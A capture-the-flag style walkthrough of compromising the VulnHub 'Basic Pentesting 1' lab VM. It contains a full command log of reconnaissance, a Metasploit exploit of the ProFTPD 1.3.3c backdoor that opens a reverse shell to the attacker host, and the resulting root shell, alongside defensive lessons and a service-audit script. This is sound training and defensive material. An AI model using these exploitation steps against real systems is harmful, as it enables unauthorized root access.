In this walkthrough we’ll look at how to compromise the simple VulnHub image, ‘Basic Pentesting 1’, released by Josiah Pierce. The aim is to get root privileges on the machine.
Details about the image and how to download it can all be found on the vulnhub website – https://www.vulnhub.com/entry/basic-pentesting-1,216/
Once the image has been downloaded and opened, it immediately gives away an OS type, version and a username. We can note these down for use later on.
To start our reconnaissance we need to find the IP address of the target;
This identifies 192.168.86.128 as the IP address we need. Note this is assigned by local DHCP, so you will likely have a different target IP address and MAC address.
Now we know what we’re aiming for, let’s perform some basic recon and see what services are running.
We can note down the various services and software types for reference later, but for now we can start with the web service on TCP 80 as these are often low-hanging fruit.
It looks like there is a very basic website and, if you look at the source code, nothing obviously exploitable;
Let’s see if there are any hidden sites available to us by using Directory Buster;
Success. I tried to have a poke around the site but it was really slow to respond. Unsure whether this was a deliberate ‘feature’ or not, I left the page to ponder itself while I looked at other services on the machine. Earlier on we found an FTP service, ProFTPD v1.3.3c; let’s see if there are any known vulnerabilities for it on the Exploit Database.
Bingo! Upon reviewing the exploits, one of them explains that some ‘enterprising’ people tampered with the source code associated with this release and inserted a backdoor. The code was compiled and released by the publisher before they spotted the issue. These exploits make use of that backdoor. In the interest of saving time, I thought I’d try for a quick win with Metasploit rather than reverse engineering the code to build my own exploit.
Fire up msfconsole and identify the exploit module;
Then configure the module, in this case by identifying the IP address of the target.
The exploit was successful and, even more luckily for us, the FTP server was running as root, so that’s it, game over.
What are the morals of the story here for security-conscious admins?
- Only run services you really need. If you don’t need it, turn it off to reduce the potential attack surface.
- Keep your software up to date and review release notes and security resources such as CVE and Exploit-DB for vulnerabilities. This version of ProFTPD is several years old, so there is no excuse for not having spotted the issue.
- Only run services with suitably privileged accounts. It seems unlikely that an FTP daemon really needs to run as root. It could quite easily have been run as a service account with lower privileges, which would have made compromising the machine much harder.
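As an added example (not from the original post), here is a small Python audit that turns the first two morals into a repeatable check: it parses the nmap -sV service table shown at the end of the post and flags any listener outside an expected-service baseline, plus any product/version on a known-bad list. The baseline (only SSH and HTTP expected) and the known-bad table are assumptions for illustration.

```python
import re

# Constructed sample: the service table from the nmap -sV scan shown at the end of the post.
NMAP_OUTPUT = """\
Nmap scan report for 192.168.86.128
Host is up (0.0018s latency).
Not shown: 65532 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     ProFTPD 1.3.3c
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
"""

# Assumed baseline for this host: only SSH and HTTP should be exposed.
EXPECTED_PORTS = {22, 80}

# Assumed known-bad table; the ProFTPD 1.3.3c backdoor is the one discussed in the post.
KNOWN_BAD = {("ProFTPD", "1.3.3c"): "a compromised-source backdoor release (upgrade to a clean, current build)"}

PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+open\s+(\S+)\s*(.*)$")


def parse_services(nmap_text):
    """Return a list of (port, service, product, version) tuples from nmap -sV output."""
    services = []
    for line in nmap_text.splitlines():
        m = PORT_LINE.match(line)
        if not m:
            continue
        port, _proto, name, version_field = m.groups()
        tokens = version_field.split()
        # The version is the first token that starts with a digit; everything before it is the product.
        idx = next((i for i, t in enumerate(tokens) if t[0].isdigit()), None)
        if idx is None:
            product, version = version_field, ""
        else:
            product, version = " ".join(tokens[:idx]), tokens[idx]
        services.append((int(port), name, product, version))
    return services


def audit(services, expected_ports=EXPECTED_PORTS, known_bad=KNOWN_BAD):
    """Flag listeners outside the baseline and known-vulnerable versions; return the findings."""
    findings = []
    for port, name, product, version in services:
        if port not in expected_ports:
            findings.append(f"{port}/{name}: not in the expected-service baseline, disable if unneeded")
        reason = known_bad.get((product, version))
        if reason:
            findings.append(f"{port}/{name}: {product} {version} is {reason}")
    return findings


if __name__ == "__main__":
    for finding in audit(parse_services(NMAP_OUTPUT)):
        print(finding)
```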
And what are the morals of the story for the penetration tester?
- Be thorough in your enumeration and note down what you see.
- Don’t get dragged down a rabbit hole early on; keep looking for low-hanging fruit before committing lots of time to something.
- Use Metasploit by all means, but understand what is going on and why. Could you have reverse engineered the module to create your own version of the exploit if needed?
Command line I/O from this attack (edited for clarity);
root@kali:~# netdiscover -r 192.168.86.86.0/24
 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180
_____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname
-----------------------------------------------------------------------------
 192.168.86.1    00:50:56:c0:00:01      1      60  VMware, Inc.
 192.168.86.128  00:0c:29:ca:f6:ba      1      60  VMware, Inc.
 192.168.86.254  00:50:56:fc:1f:cf      1      60  VMware, Inc.

root@kali:~# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.86.129  netmask 255.255.255.0  broadcast 192.168.86.255
**SNIP**

root@kali:~# nmap -n -v -Pn -p- -sV 192.168.86.128
Starting Nmap 7.60 ( https://nmap.org ) at 2018-02-07 13:44 GMT
NSE: Loaded 42 scripts for scanning.
Initiating ARP Ping Scan at 13:44
Scanning 192.168.86.128 [1 port]
Completed ARP Ping Scan at 13:44, 0.04s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 13:44
Scanning 192.168.86.128 [65535 ports]
Discovered open port 80/tcp on 192.168.86.128
Discovered open port 22/tcp on 192.168.86.128
Discovered open port 21/tcp on 192.168.86.128
Completed SYN Stealth Scan at 13:44, 5.72s elapsed (65535 total ports)
Initiating Service scan at 13:44
Scanning 3 services on 192.168.86.128
Completed Service scan at 13:45, 10.01s elapsed (3 services on 1 host)
NSE: Script scanning 192.168.86.128.
Initiating NSE at 13:45
Completed NSE at 13:45, 0.02s elapsed
Initiating NSE at 13:45
Completed NSE at 13:45, 0.00s elapsed
Nmap scan report for 192.168.86.128
Host is up (0.0018s latency).
Not shown: 65532 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     ProFTPD 1.3.3c
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
MAC Address: 00:0C:29:CA:F6:BA (VMware)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.42 seconds
           Raw packets sent: 65536 (2.884MB) | Rcvd: 65536 (2.621MB)

root@kali:~# dirb http://192.168.86.128

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Wed Feb  7 13:48:39 2018
URL_BASE: http://192.168.86.128/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.86.128/ ----
+ http://192.168.86.128/index.html (CODE:200|SIZE:177)
==> DIRECTORY: http://192.168.86.128/secret/
+ http://192.168.86.128/server-status (CODE:403|SIZE:302)

---- Entering directory: http://192.168.86.128/secret/ ----
+ http://192.168.86.128/secret/index.php (CODE:301|SIZE:0)
==> DIRECTORY: http://192.168.86.128/secret/wp-admin/
==> DIRECTORY: http://192.168.86.128/secret/wp-content/
==> DIRECTORY: http://192.168.86.128/secret/wp-includes/
+ http://192.168.86.128/secret/xmlrpc.php (CODE:405|SIZE:42)

---- Entering directory: http://192.168.86.128/secret/wp-admin/ ----
+ http://192.168.86.128/secret/wp-admin/admin.php (CODE:302|SIZE:0)
==> DIRECTORY: http://192.168.86.128/secret/wp-admin/css/
==> DIRECTORY: http://192.168.86.128/secret/wp-admin/images/
==> DIRECTORY: http://192.168.86.128/secret/wp-admin/includes/
+ http://192.168.86.128/secret/wp-admin/index.php (CODE:302|SIZE:0)
==> DIRECTORY: http://192.168.86.128/secret/wp-admin/js/
==> DIRECTORY: http://192.168.86.128/secret/wp-admin/maint/
==> DIRECTORY: http://192.168.86.128/secret/wp-admin/network/
==> DIRECTORY: http://192.168.86.128/secret/wp-admin/user/
**SNIP**

root@kali:~# searchsploit proftpd 1.3.3c
ProFTPd 1.3.3c - Compromised Source Backdoor Remote Code Execution
ProFTPd-1.3.3c - Backdoor Command Execution (Metasploit)

root@kali:~# msfconsole
msf > search proftpd

Matching Modules
================

   Name                                         Disclosure Date  Rank       Description
   ----                                         ---------------  ----       -----------
   exploit/freebsd/ftp/proftp_telnet_iac        2010-11-01       great      ProFTPD 1.3.2rc3 - 1.3.3b Telnet IAC Buffer Overflow (FreeBSD)
   exploit/linux/ftp/proftp_sreplace            2006-11-26       great      ProFTPD 1.2 - 1.3.0 sreplace Buffer Overflow (Linux)
   exploit/linux/ftp/proftp_telnet_iac          2010-11-01       great      ProFTPD 1.3.2rc3 - 1.3.3b Telnet IAC Buffer Overflow (Linux)
   exploit/linux/misc/netsupport_manager_agent  2011-01-08       average    NetSupport Manager Agent Remote Buffer Overflow
   exploit/unix/ftp/proftpd_133c_backdoor       2010-12-02       excellent  ProFTPD-1.3.3c Backdoor Command Execution
   exploit/unix/ftp/proftpd_modcopy_exec        2015-04-22       excellent  ProFTPD 1.3.5 Mod_Copy Command Execution

msf > use exploit/unix/ftp/proftpd_133c_backdoor
msf exploit(unix/ftp/proftpd_133c_backdoor) > show options

Module options (exploit/unix/ftp/proftpd_133c_backdoor):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST                   yes       The target address
   RPORT  21               yes       The target port (TCP)

Exploit target:

   Id  Name
   --  ----
   0   Automatic

msf exploit(unix/ftp/proftpd_133c_backdoor) > set rhost 192.168.86.128
rhost => 192.168.86.128
msf exploit(unix/ftp/proftpd_133c_backdoor) > exploit

[*] Started reverse TCP double handler on 192.168.86.129:4444
[*] 192.168.86.128:21 - Sending Backdoor Command
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo uGd9Cl4X4B1LGV5c;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "uGd9Cl4X4B1LGV5c\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (192.168.86.129:4444 -> 192.168.86.128:57980) at 2018-02-07 13:59:56 +0000

id
uid=0(root) gid=0(root) groups=0(root),65534(nogroup)